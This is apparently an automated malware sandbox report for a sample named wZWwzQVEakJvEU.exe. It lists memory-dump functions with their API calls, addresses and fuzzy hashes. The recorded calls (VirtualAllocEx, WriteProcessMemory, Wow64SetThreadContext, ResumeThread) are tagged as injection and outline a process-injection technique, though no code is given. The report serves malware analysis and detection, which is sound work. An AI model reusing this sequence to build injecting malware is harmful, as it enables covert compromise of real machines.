CreateActCtxA.KERNEL32(?), ref: 00FBF6B9

Memory Dump Source

Source File: 0000000A.00000002.1848373717.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fb0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f5fceca29fecee7b721702a222205403843c3e4f023e78d24d5582f4643a926a
Instruction ID: ca0608b71acdd3953b1d5553a809340408f2a54abaa9c58b0adb7fb4550df5a4
Opcode Fuzzy Hash: f5fceca29fecee7b721702a222205403843c3e4f023e78d24d5582f4643a926a
Instruction Fuzzy Hash: BD51D5B1D002198FDB20DFA9C845BDEBBF5AF49300F1084AAD509BB251DB716A89CF91

Function 0A0472FC Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A0473D3

Memory Dump Source

Source File: 0000000A.00000002.1857621470.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a040000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 29ab85e5f11279565fa8daa2cce4d06a70a927e5502d7924b29493bb2aa7b489
Instruction ID: 42aba8f9d1e8457cf238d7d67c49e0e1b33f9fd178edcd8077a0c4fe27fc882c
Opcode Fuzzy Hash: 29ab85e5f11279565fa8daa2cce4d06a70a927e5502d7924b29493bb2aa7b489
Instruction Fuzzy Hash: 6441B9B4D012589FCF00CFA9D984AEEFBF1BB49310F20942AE818B7240D774AA45CF64

Function 0A047300 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A0473D3

Memory Dump Source

Source File: 0000000A.00000002.1857621470.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a040000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: eec36d00f88b5da5d2ce3a42b06d52ed21ad1e2bf8e672c684f5208bea40717c
Instruction ID: 4d29c9dc9489f64846e82ca1ccf04d8f262aa675b61b986f5c9bf2f36091d6ad
Opcode Fuzzy Hash: eec36d00f88b5da5d2ce3a42b06d52ed21ad1e2bf8e672c684f5208bea40717c
Instruction Fuzzy Hash: 704199B4D012589FCB10CFA9D984AEEFBF1BB49310F20942AE818B7250D774AA45CF64

Function 0A047457 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A04750A

Memory Dump Source

Source File: 0000000A.00000002.1857621470.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a040000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ff1718fbaf450f3ffeedb3c64b83916128091abe7011357cb6fd9fc29b4c968a
Instruction ID: 1ccf766e93d82a71d2bb15b784afead9377f8d7d11376863c6fca91f3e89c684
Opcode Fuzzy Hash: ff1718fbaf450f3ffeedb3c64b83916128091abe7011357cb6fd9fc29b4c968a
Instruction Fuzzy Hash: BC41A8B5D002589FCF10CFA9D884AEEFBB1BB49310F10A42AE819B7250C775A945CF68

Function 0A047458 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A04750A

Memory Dump Source

Source File: 0000000A.00000002.1857621470.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a040000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 19fe45471c566f6c3bb0ffbb622286c36130de79e6a9dc0ebe465d3bba7230ad
Instruction ID: f7fc1899553e6e69fba057717e91050b1c4dddb3a8ce0342f108d74103b23aea
Opcode Fuzzy Hash: 19fe45471c566f6c3bb0ffbb622286c36130de79e6a9dc0ebe465d3bba7230ad
Instruction Fuzzy Hash: 8541ABB5D042589FCF10CFA9D884AEEFBB1BB49310F10942AE815B7240D775A945CF68

Function 0A0471DC Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A04728A

Memory Dump Source

Source File: 0000000A.00000002.1857621470.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a040000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fba1e5e1e18afb0b7fc0fa9bc74e9873b40f9120a919beb6f2c8fa7b4527eae5
Instruction ID: 119e3ad330509b75a477bdfe76deb62d45cf592d2915374126c4679f03ad3f2e
Opcode Fuzzy Hash: fba1e5e1e18afb0b7fc0fa9bc74e9873b40f9120a919beb6f2c8fa7b4527eae5
Instruction Fuzzy Hash: 483187B8D042589FCF10CFA9D984ADEFBB1BB49310F10A42AE815B7250D735A946CF59

Function 0A0471E0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A04728A

Memory Dump Source

Source File: 0000000A.00000002.1857621470.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a040000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8f75f75e5d1147b9516f66bb7d8b8e73b04bbb60e0eda4554f8bd6b9168c3ddd
Instruction ID: fada75e4508d7e63fa56993b53d3e34346ca6daf1aaf17236e1955caec53b773
Opcode Fuzzy Hash: 8f75f75e5d1147b9516f66bb7d8b8e73b04bbb60e0eda4554f8bd6b9168c3ddd
Instruction Fuzzy Hash: 8C3187B8D042589FCF10CFA9D984ADEFBB1BB49310F10A42AE815B7250D735A945CF58

Function 0A0470B0 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0A047167

Memory Dump Source

Source File: 0000000A.00000002.1857621470.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a040000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4d263818039a47f4c9f10d6b2a72ff38ed9b0aeb66264ef649228a4b88a771ef
Instruction ID: 6d384ebd1b979b96b62b50ba517e15f09ba6851fe91943a9364df78b182e4be8
Opcode Fuzzy Hash: 4d263818039a47f4c9f10d6b2a72ff38ed9b0aeb66264ef649228a4b88a771ef
Instruction Fuzzy Hash: 9C41CBB4D002189FCB14DFA9D885AEEFBF1BF49310F24942AE419B7250D738A945CF54

Function 0A0470B8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0A047167

Memory Dump Source

Source File: 0000000A.00000002.1857621470.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a040000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 49d0e46048d584d96774bd00a60b2485c321609c493cfff78304b49a52c3cdf1
Instruction ID: 854148cb21c3df9d17827a7ab7b1459b7e65c24aaa8948b758d40053ccecaf40
Opcode Fuzzy Hash: 49d0e46048d584d96774bd00a60b2485c321609c493cfff78304b49a52c3cdf1
Instruction Fuzzy Hash: 2E31BBB4D002589FCB10DFAAD884AEEFBF1BB49310F24942AE418B7250D778A945CF64

Function 00FB85A8 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00FB864F

Memory Dump Source

Source File: 0000000A.00000002.1848373717.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fb0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 2076b345503ec8c25efd17597a7f9595c5469849032447aac1175a1f07e839d4
Instruction ID: cbe12300357c44934ba413cad134fbffd9ef846a040309512d25107f7772c271
Opcode Fuzzy Hash: 2076b345503ec8c25efd17597a7f9595c5469849032447aac1175a1f07e839d4
Instruction Fuzzy Hash: 9331B9B9D002589FCB10CFAAD884ADEFBF5BB49310F24A02AE814B7350D774A945CF64

Function 0A04AFD8 Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,00000000), ref: 0A04B07B

Memory Dump Source

Source File: 0000000A.00000002.1857621470.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a040000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a7f7b7100d2901c6dd7ad74e0445ae46cadcd30bb2e3669de99d42ccfc84df7c
Instruction ID: 835959dfa2b4b710e53c411921d5f6042fd027181ffb6a332e71dd942f72dadd
Opcode Fuzzy Hash: a7f7b7100d2901c6dd7ad74e0445ae46cadcd30bb2e3669de99d42ccfc84df7c
Instruction Fuzzy Hash: 2A3188B8D05248AFCB10CFA9D584ADEFBF5BB09310F24902AE818B7320D375A945CF64

Function 0A043CE0 Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,00000000), ref: 0A04B07B

Memory Dump Source

Source File: 0000000A.00000002.1857621470.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a040000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 30cc46c52fba33390905da574f6c1fcd34f2824bc0f6db9232f38de0a20c00a3
Instruction ID: 0a9d087b1b0b2c1ba67d82d4694c9691fe920827596659dd43e6c27ab25bbdb7
Opcode Fuzzy Hash: 30cc46c52fba33390905da574f6c1fcd34f2824bc0f6db9232f38de0a20c00a3
Instruction Fuzzy Hash: B73188B8D04248AFCB10CFA9D584A9EFBF4FB49310F14902AE818B7310D375A945CF94

Function 0A046FC0 Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0A047046

Memory Dump Source

Source File: 0000000A.00000002.1857621470.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a040000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 84d9e31f30c5781a630d91be688531c1556a091dc5bffdf4933b4ffe399763bd
Instruction ID: e81f04b52485c5bb06dffd4bd32c2ca65203d740daf3f2b5d57430f77a123047
Opcode Fuzzy Hash: 84d9e31f30c5781a630d91be688531c1556a091dc5bffdf4933b4ffe399763bd
Instruction Fuzzy Hash: 1631EBB4D012189FCB14DFA9D885ADEFBB0BB49310F20942AE419B7350C735A845CF98

Function 0A046FC8 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0A047046

Memory Dump Source

Source File: 0000000A.00000002.1857621470.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a040000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d9f8e4226c6749fb950fdc92985f643d7e6f9bfc2d801f6b803f4cb1c76007cf
Instruction ID: bee1f1f5f742381397f1e1bb4793d8817e563b5570f9582a6eefeaa4f28c455a
Opcode Fuzzy Hash: d9f8e4226c6749fb950fdc92985f643d7e6f9bfc2d801f6b803f4cb1c76007cf
Instruction Fuzzy Hash: 6931CAB4D012189FCB14DFAAD884A9EFBF4BB49310F10942AE819B7340C775A901CF98

Function 00FB9920 Relevance: 1.3, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 00FBF566

Memory Dump Source

Source File: 0000000A.00000002.1848373717.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fb0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: fbeeeba3580846890759ed86fbeaeedc536100799aa268ff21dc1edd3456a22f
Instruction ID: dc216a66f2639314f252b20e8799727352f372cce6fb49725cfcbb63b7a9538f
Opcode Fuzzy Hash: fbeeeba3580846890759ed86fbeaeedc536100799aa268ff21dc1edd3456a22f
Instruction Fuzzy Hash: EB31CEB5D04218DFCB10DFAAD884AEEFBF4AB49310F14906AE815B3350D374A945CFA4

Function 00E2D3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1848103067.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e2d000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2bb5350f023d771d1792fe36d1966f693569b763c56d88c481f06ba858f214d
Instruction ID: 28edb99264e5428ab40bd7d470e4bc237e9725c84ecf8b8b01316084f55ac626
Opcode Fuzzy Hash: e2bb5350f023d771d1792fe36d1966f693569b763c56d88c481f06ba858f214d
Instruction Fuzzy Hash: 6C213AB1508304DFDB05EF14EDC0B26BF65FB94324F24C669DA0A1B246C336E856C7A1

Function 00E2D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1848103067.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e2d000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25fffbb0913ac9213dbf6a8eca03ed1a9e3bdaf3b239a7f95b857490e8175cc5
Instruction ID: 3ebfc7f21bd7e5a4aa7e6aaa96eb9547c57e2dcdc2e488516dcd033bae05d046
Opcode Fuzzy Hash: 25fffbb0913ac9213dbf6a8eca03ed1a9e3bdaf3b239a7f95b857490e8175cc5
Instruction Fuzzy Hash: 01214871548304DFCB01DF04EDC4B16BFA5FB98328F20C568EA0A5B256C376D856C7A1

Function 00E3D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1848146616.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1410935ada4dd2b49586a1de863bf0f6c843d3da364a6b8ebbc75c51e16fe7a4
Instruction ID: 906efffa9c7b6de89c70be2246f5026e30df6b92cb23a31b3e82249b49e08e6d
Opcode Fuzzy Hash: 1410935ada4dd2b49586a1de863bf0f6c843d3da364a6b8ebbc75c51e16fe7a4
Instruction Fuzzy Hash: BF21F871508204DFDB05DF54E9C8B26BFA5FB94314F24C56DD8095B261C736D816CA61

Function 00E3D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1848146616.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a8feec6fe76bae2d58a837207c3156588be97b28dd579c25343fa9c0d35db9
Instruction ID: aeb978dbdf12ea0434bd219b4b5d72c8d72b9e247a5c11be02891f941e21ccdc
Opcode Fuzzy Hash: c2a8feec6fe76bae2d58a837207c3156588be97b28dd579c25343fa9c0d35db9
Instruction Fuzzy Hash: 3A21D3B5608200DFCB19DF14E9C8B16BFA6FB94714F24C569D84A5B296C336D807CA61

Function 00E3D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1848146616.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80033a12ca4ef7510937618b426802cea9ae4d797ddb73224c60dd7e13634c0f
Instruction ID: b61e5a551da1943c0e1dcdd16bb7ea2071189870a8b9b53982367b70378ce8b8
Opcode Fuzzy Hash: 80033a12ca4ef7510937618b426802cea9ae4d797ddb73224c60dd7e13634c0f
Instruction Fuzzy Hash: 8F21807550D3808FCB06CF24D994715BF72EB46314F28C5EAD8498F2A7C33A980ACB62

Function 00E2D3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1848103067.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e2d000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: 5f1ffb72b0502c944f2e78a8af8300add06a5ea2bf811b39b516a035764b0b53
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: A8112676508240CFCB12DF00D9C4B16BF72FB94324F24C6A9DD090B656C33AE85ACBA1

Function 00E2D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1848103067.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e2d000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: bea2b205b24d227883bc04019577a2bf0b346bfa9d47d7d73f61a7dc4000eb50
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: F411E976544240CFDB15CF14D9C4B16BF71FB94328F24C5A9D9094B256C336D856CB91

Function 00E3D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1848146616.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: 043f64c960b75c861ed89d0eee0ccf66a496d0d02e112ec964e609399ca8f0bc
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: C611BE75508240DFCB02CF50D9C8B16BF71FB84328F24C6ADD8494B2A6C33AD81ACB51

Analysis Process: wZWwzQVEakJvEU.exePID: 7732, Parent PID: 7408COMMON

Execution Graph

Execution Coverage:	13.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	30
Total number of Limit Nodes:	1

Executed Functions

Function 06A97148 Relevance: 1.6, APIs: 1, Instructions: 53
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,06A974A6), ref: 06A97656

Memory Dump Source

Source File: 0000000E.00000002.1969470573.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a90000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 10873b8ac2afa4694b86a7278f2d2eac208c6298cdf336acc0ef600325d27dc0
Instruction ID: bb4a4db99b9ff85cad9fcf3d92c571cc654ea0ddb960c34f012e98036edeb0ef
Opcode Fuzzy Hash: 10873b8ac2afa4694b86a7278f2d2eac208c6298cdf336acc0ef600325d27dc0
Instruction Fuzzy Hash: B61123B5C003498FCB10EF9AC848B9EFBF4EB88210F24841AD529B7200D775A545CFA5

Function 014A0CE0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 014A0D47

Memory Dump Source

Source File: 0000000E.00000002.1952042820.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14a0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 7c216bd81a1a8fcf370a4f47591ff4b703943a35b28288d17d9b3ab1b05a5693
Instruction ID: a306bf36a485ef6736851379b08c4bcd5a9ea8db21c045f975fe9a412be97094
Opcode Fuzzy Hash: 7c216bd81a1a8fcf370a4f47591ff4b703943a35b28288d17d9b3ab1b05a5693
Instruction Fuzzy Hash: AE1116B5D003498FDB24DFAAD4497EEBBF4EB88324F20841AD419A7250C735A945CFA5

Function 06A975EF Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,06A974A6), ref: 06A97656

Memory Dump Source

Source File: 0000000E.00000002.1969470573.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a90000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: aa3a65158415b997a88347d7c6d6fc977f3ccb5ac4cc6507110f59bd16e2d1e7
Instruction ID: 4b6def816a8144035e7c3a7a0824516ed5146666950c7a0a3953d0ec72f174cf
Opcode Fuzzy Hash: aa3a65158415b997a88347d7c6d6fc977f3ccb5ac4cc6507110f59bd16e2d1e7
Instruction Fuzzy Hash: 5811F0B5C003498FCB10DFAAC844ADEFBF5AB88224F24841AD529A7250C775A545CFA5

Function 014A0CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 014A0D47

Memory Dump Source

Source File: 0000000E.00000002.1952042820.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14a0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 326b56b95354b03d7f15395cc04809228925953ff972fa00e89031dd3ab2f00a
Instruction ID: 629d8f333e28f685998f56ddcc9fa53e5f84f068879c4e22c862090fe2562507
Opcode Fuzzy Hash: 326b56b95354b03d7f15395cc04809228925953ff972fa00e89031dd3ab2f00a
Instruction Fuzzy Hash: 9E1136B19003098FCB24DFAAC4457DFFFF4EB88324F20841AD519A7240CB35A545CBA5

Function 06AE1550 Relevance: 1.4, Instructions: 1409COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1969589860.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6ae0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d986c80c865b58de58edb113c93adc08eb2e687066b710e8aa5db7cc5c0e58c7
Instruction ID: d4317ef457bfa442b1585bd9c364c50b5ece2cc4364259a3a3f3b97e8ff0a6cc
Opcode Fuzzy Hash: d986c80c865b58de58edb113c93adc08eb2e687066b710e8aa5db7cc5c0e58c7
Instruction Fuzzy Hash: AEC24F74B002189FCB55DB58C851BADBBB6FF89700F508099E60A9F3A1DB71EE418F91

Function 06AE349D Relevance: 1.3, Instructions: 1279COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1969589860.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6ae0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b677831c05f39b584491719632544148d4b678bb0ec4cbc339274019fd08a1e
Instruction ID: de808140a5cd79530e3dd201ff8d28462a0c73a7485d6a934555c68e50b552cf
Opcode Fuzzy Hash: 5b677831c05f39b584491719632544148d4b678bb0ec4cbc339274019fd08a1e
Instruction Fuzzy Hash: 2AA19C74B002449FCF45EB78C854A6EBBF6EF89704B1484AAE506DB3A2CB71DC01CB61

Function 06AE0048 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1969589860.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6ae0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6022791993461955b177e001f95492d2dff4e250a8050f0603126dd508c2446
Instruction ID: 55785a697277e748ef436e1c5f88de62c85e8e4556572d9733f2dcce00571b21
Opcode Fuzzy Hash: a6022791993461955b177e001f95492d2dff4e250a8050f0603126dd508c2446
Instruction Fuzzy Hash: 85427A707006258FCB64AF78D45096EBBF2FFD1702B418A4DD5079B3A1CBB9AC458B85

Function 06AE04F4 Relevance: .5, Instructions: 500COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1969589860.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6ae0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74805493005184d70b3b17f7d9641d9fbd6c860709fb93020e3d83171f0105d9
Instruction ID: 0b57f2b84ccc2820dee6f49072102b1ca34b6d4a20367b8f366e944b65e1c107
Opcode Fuzzy Hash: 74805493005184d70b3b17f7d9641d9fbd6c860709fb93020e3d83171f0105d9
Instruction Fuzzy Hash: 44127970B006248FDB64AF68D840A6EBBF2FF95701F41894DE5029F3A1CBB5EC458B85

Function 06AE056A Relevance: .5, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1969589860.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6ae0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 500b518cb78bf0572e193574f8abcbdd0eeea4d844d3278676ddc4cb1210aa6b
Instruction ID: c37b1b4c4775a3f3a462b749cc121e13ceb26248833674dc7ec5966f9da94c41
Opcode Fuzzy Hash: 500b518cb78bf0572e193574f8abcbdd0eeea4d844d3278676ddc4cb1210aa6b
Instruction Fuzzy Hash: 58127870B006248FDB54AF68D840A6EBBF2FF95701F51894DE5029F3A2CBB5EC458B85

Function 06AE05E0 Relevance: .4, Instructions: 428COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1969589860.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6ae0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e43d09fd78b0e60649e8ff6d0237f87b33b4f7dde95c3a6fdb971df894bdec6
Instruction ID: 896d82d2c1c33bb3448762b9ba3bf1f37ee4e83b49f572435b7385a0072bd14b
Opcode Fuzzy Hash: 0e43d09fd78b0e60649e8ff6d0237f87b33b4f7dde95c3a6fdb971df894bdec6
Instruction Fuzzy Hash: D0029C70B006248FDB54EF68D840A6EBBF2FF95705F518949E5029F3A2CBB5EC458B81

